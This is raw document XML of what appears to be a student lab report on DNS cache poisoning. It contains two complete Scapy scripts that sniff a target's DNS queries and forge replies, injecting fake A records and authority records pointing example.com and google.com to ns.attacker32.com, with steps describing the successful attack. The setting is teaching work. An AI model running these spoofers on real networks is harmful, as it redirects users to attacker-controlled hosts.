    <w:p w14:paraId="01C193EE" w14:textId="11C4F78E" w:rsidR="0048283D" w:rsidRDefault="00E96DF3" w:rsidP="003B0241">
      <w:r w:rsidRPr="00E96DF3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D51FEA7" wp14:editId="1DA3035E">
            <wp:extent cx="4864350" cy="704886"/>
            <wp:effectExtent l="0" t="0" r="0" b="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C439" w14:textId="3CA1A07B" w:rsidR="00E96DF3" w:rsidRDefault="007C3924" w:rsidP="003B0241">
      <w:r>
        <w:t>After this entry is added, we start the process of attack from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F966168" w14:textId="49B6B10D" w:rsidR="007C3924" w:rsidRDefault="007D5F5A" w:rsidP="003B0241">
      <w:r>
        <w:t>flushing the local DNS cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B30B8E" w14:textId="48298944" w:rsidR="007D5F5A" w:rsidRDefault="007D5F5A" w:rsidP="003B0241">
      <w:r w:rsidRPr="007D5F5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179B72A1" wp14:editId="418937AC">
            <wp:extent cx="3048157" cy="1054154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157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CFFD" w14:textId="3CDFE0B0" w:rsidR="007D5F5A" w:rsidRDefault="00AB6705" w:rsidP="003B0241">
      <w:r>
        <w:t>Starting the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB8518" w14:textId="7A1E2D98" w:rsidR="00AB6705" w:rsidRDefault="00063620" w:rsidP="003B0241">
      <w:r w:rsidRPr="00063620">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FA1666" wp14:editId="323A1AAD">
            <wp:extent cx="2705239" cy="825542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81CBF" w14:textId="0FBC719D" w:rsidR="00063620" w:rsidRDefault="00063620" w:rsidP="003B0241">
      <w:r>
        <w:t>Running the dig command from the user machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F4CD5" w14:textId="02CAC04C" w:rsidR="00063620" w:rsidRDefault="00BD08C8" w:rsidP="003B0241">
      <w:r w:rsidRPr="00BD08C8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24933422" wp14:editId="1371F5C9">
            <wp:extent cx="6858000" cy="5048885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FD97C" w14:textId="27873488" w:rsidR="00225F50" w:rsidRDefault="00225F50" w:rsidP="003B0241"/>
    <w:p w14:paraId="08F6FEA8" w14:textId="1A603176" w:rsidR="00225F50" w:rsidRDefault="00225F50" w:rsidP="003B0241">
      <w:r>
        <w:t>Output on the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BA523" w14:textId="77563A5B" w:rsidR="00BD08C8" w:rsidRDefault="00225F50" w:rsidP="003B0241">
      <w:r w:rsidRPr="00225F50">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D942C05" wp14:editId="786982C5">
            <wp:extent cx="2787793" cy="1085906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 2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A1A1" w14:textId="068A7EF9" w:rsidR="00225F50" w:rsidRDefault="00225F50" w:rsidP="003B0241"/>
    <w:p w14:paraId="0A35D600" w14:textId="7CDEBCB9" w:rsidR="00225F50" w:rsidRDefault="00225F50" w:rsidP="003B0241">
      <w:r>
        <w:t>The attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FAFEF8" w14:textId="44CFFEFD" w:rsidR="00225F50" w:rsidRDefault="00225F50" w:rsidP="003B0241"/>
    <w:p w14:paraId="7A761523" w14:textId="6896385A" w:rsidR="006040FC" w:rsidRDefault="006040FC" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCD3D9" w14:textId="4AB5ACC6" w:rsidR="006040FC" w:rsidRDefault="006040FC" w:rsidP="003B0241">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E90E7AC" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08148ABA" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AC1DD" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="788BE8EA" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>target = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A734A9A" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="2401B782" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9CD97" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481121D" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="76A0D0E7" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B1D1D" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818AA4B" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="0549C109" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F3C2D" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134763F" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="74A917F0" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16085637" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E0318E" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">                 ttl=259200, rdata='1.1.1.1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9E98E" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="61E1C5AD" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D695690" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    NSsec1 = DNSRR(rrname='example.com', type='NS',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2AAE8D" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">                   ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297721B4" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="5A54BEFF" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003016DB" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE97758" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=1, arcount=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94561E" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">                 an=Anssec, ns=NSsec1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B89B62" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="402DDA50" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    # Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D157D" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE41DE" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">    send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC192E0" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="7C2C822C" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t># Sniff UDP query packets and invoke spoof_dns().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528ADA47" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t>f = 'udp and (src host {} and dst port 53)'.format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B20331" w14:textId="6988909F" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1">
      <w:r>
        <w:t xml:space="preserve">pkt = sniff(iface='br-ed9341677666', filter=f, prn=spoof_dns)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37211654" w14:textId="77777777" w:rsidR="00D550B1" w:rsidRPr="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="00D550B1"/>
    <w:p w14:paraId="59CB933D" w14:textId="0B6263F1" w:rsidR="006040FC" w:rsidRDefault="006040FC" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0DCB5" w14:textId="0032EC82" w:rsidR="00D550B1" w:rsidRDefault="00D550B1" w:rsidP="003B0241">
      <w:r>
        <w:t>First we clear the DNS cache on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7E41C" w14:textId="43674860" w:rsidR="00D550B1" w:rsidRDefault="006B02B7" w:rsidP="003B0241">
      <w:r w:rsidRPr="006B02B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A5D31A" wp14:editId="15A05847">
            <wp:extent cx="3035456" cy="59693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5456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67A2" w14:textId="4C0A2A01" w:rsidR="006B02B7" w:rsidRDefault="006B02B7" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, we run the attack on the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA53E3" w14:textId="7918AA91" w:rsidR="006B02B7" w:rsidRDefault="00A33A14" w:rsidP="003B0241">
      <w:r w:rsidRPr="00A33A14">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="086D9BDD" wp14:editId="5DD2EA30">
            <wp:extent cx="2559049" cy="484094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 2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&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="13369"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2559182" cy="484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4680C" w14:textId="0E41A790" w:rsidR="00A33A14" w:rsidRDefault="00A33A14" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, we run the dig command on the user machine</w:t>
      </w:r>
      <w:r w:rsidR="00A80622">
        <w:t xml:space="preserve"> for ‘www.example.com’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6078C" w14:textId="6E309179" w:rsidR="00A80622" w:rsidRDefault="00607EBD" w:rsidP="003B0241">
      <w:r w:rsidRPr="00607EBD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5849BB87" wp14:editId="733FD3B2">
            <wp:extent cx="6858000" cy="4384675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4594" w14:textId="232A1817" w:rsidR="00A65914" w:rsidRDefault="00607EBD" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, verify the entries on the local DNS server</w:t>
      </w:r>
      <w:r w:rsidR="00F94F35">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAFF1A" w14:textId="0A750294" w:rsidR="00F94F35" w:rsidRDefault="00360463" w:rsidP="003B0241">
      <w:r w:rsidRPr="00360463">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C93A781" wp14:editId="278DEACA">
            <wp:extent cx="6286823" cy="175269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6823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AE46" w14:textId="65D020F0" w:rsidR="00360463" w:rsidRDefault="00360463" w:rsidP="003B0241">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We can see in the above screenshot that the name server mapping has also changed successfully as we expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C8CE5" w14:textId="59A7890B" w:rsidR="00360463" w:rsidRDefault="0055256B" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, when we dig for any other websites which ‘example.</w:t>
      </w:r>
      <w:r w:rsidR="00D971B9">
        <w:t xml:space="preserve">com’ we will get fake IPs </w:t>
      </w:r>
      <w:r w:rsidR="00B47B44">
        <w:t>because the default name server has been changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B414F2E" w14:textId="49B2D1FD" w:rsidR="00FA1275" w:rsidRDefault="00FA1275" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">To see the config file of the name server, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2EB4B8" w14:textId="7CC65195" w:rsidR="00FA1275" w:rsidRDefault="00FA1275" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">We need to execute </w:t>
      </w:r>
      <w:r w:rsidR="00ED3145">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00ED3145" w:rsidRPr="00ED3145">
        <w:t>cat /etc/bind/zone_example.com</w:t>
      </w:r>
      <w:r w:rsidR="00ED3145">
        <w:t>’ on the attacker nameserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34A90E" w14:textId="38669A94" w:rsidR="00ED3145" w:rsidRDefault="0062776F" w:rsidP="003B0241">
      <w:r w:rsidRPr="0062776F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="534501FF" wp14:editId="196A7280">
            <wp:extent cx="6026460" cy="3676839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 2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26460" cy="367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7D65" w14:textId="77777777" w:rsidR="00ED3145" w:rsidRDefault="00ED3145" w:rsidP="003B0241"/>
    <w:p w14:paraId="4AEAABF3" w14:textId="113DBE1A" w:rsidR="00B47B44" w:rsidRDefault="00B47B44" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, dig ‘example.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B2AE23" w14:textId="427FBCA6" w:rsidR="00B47B44" w:rsidRDefault="00FA1275" w:rsidP="003B0241">
      <w:r w:rsidRPr="00FA1275">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142778F6" wp14:editId="6BFF76DC">
            <wp:extent cx="6858000" cy="446405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0758" w14:textId="6666FDBE" w:rsidR="00FA1275" w:rsidRDefault="00F76EFA" w:rsidP="003B0241">
      <w:r>
        <w:t>Dig ‘ftp.example.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18214442" w14:textId="67129E40" w:rsidR="00F76EFA" w:rsidRDefault="00F76EFA" w:rsidP="003B0241">
      <w:r w:rsidRPr="00F76EFA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F4C3CD6" wp14:editId="007D6EDC">
            <wp:extent cx="6858000" cy="4749800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DD29" w14:textId="562A4004" w:rsidR="00F76EFA" w:rsidRDefault="00F76EFA" w:rsidP="003B0241"/>
    <w:p w14:paraId="2DE6B64A" w14:textId="3D1CFE11" w:rsidR="00F76EFA" w:rsidRDefault="00F76EFA" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">The attack is successful, we are able to </w:t>
      </w:r>
      <w:r w:rsidR="00DD2FAF">
        <w:t xml:space="preserve">change the nameserver thereby changing </w:t>
      </w:r>
      <w:r w:rsidR="009F2824">
        <w:t>the IP address mapping for other hostnames under the same domain</w:t>
      </w:r>
      <w:r w:rsidR="008D79FD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4BA533" w14:textId="1D0D52E5" w:rsidR="008D79FD" w:rsidRDefault="008D79FD" w:rsidP="003B0241"/>
    <w:p w14:paraId="2331EBF7" w14:textId="793E035D" w:rsidR="008D79FD" w:rsidRDefault="008D79FD" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1400EB" w14:textId="6FCB4BB7" w:rsidR="008D79FD" w:rsidRDefault="008D79FD" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DF6D2" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A429395" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072484F0" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="1F0C9B72" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t>target = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B416FE" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="34E2D90E" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADAC33" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB410A0" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="38EE7369" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE6035" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4D9BA8" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="42596408" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F653D" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBC94D" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="1726576E" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4E33D" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE718E" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                 ttl=259200, rdata='1.1.1.1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217189E" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="7B1862E6" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71971B58" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    NSsec1 = DNSRR(rrname='example.com', type='NS',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0100AB" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                   ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A838A25" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    NSsec2 = DNSRR(rrname='google.com', type='NS',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357881A" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                   ttl=259200, rdata='ns.attacker32.com')               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D4568" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C7935" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="2D32923D" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0820F98B" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411F2A1" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=2, arcount=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95FFF9" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">                 an=Anssec, ns=NSsec1/NSsec2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889EC77" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="0E41788F" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    # Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BACBF0" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E5C54" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">    send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298C774" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
    <w:p w14:paraId="5A287050" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t># Sniff UDP query packets and invoke spoof_dns().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6993FA" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t>f = 'udp and (src host {} and dst port 53)'.format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6524943A" w14:textId="219EC13C" w:rsidR="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7">
      <w:r>
        <w:t xml:space="preserve">pkt = sniff(iface='br-ed9341677666', filter=f, prn=spoof_dns)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6267CC8C" w14:textId="77777777" w:rsidR="000D06E7" w:rsidRPr="000D06E7" w:rsidRDefault="000D06E7" w:rsidP="000D06E7"/>
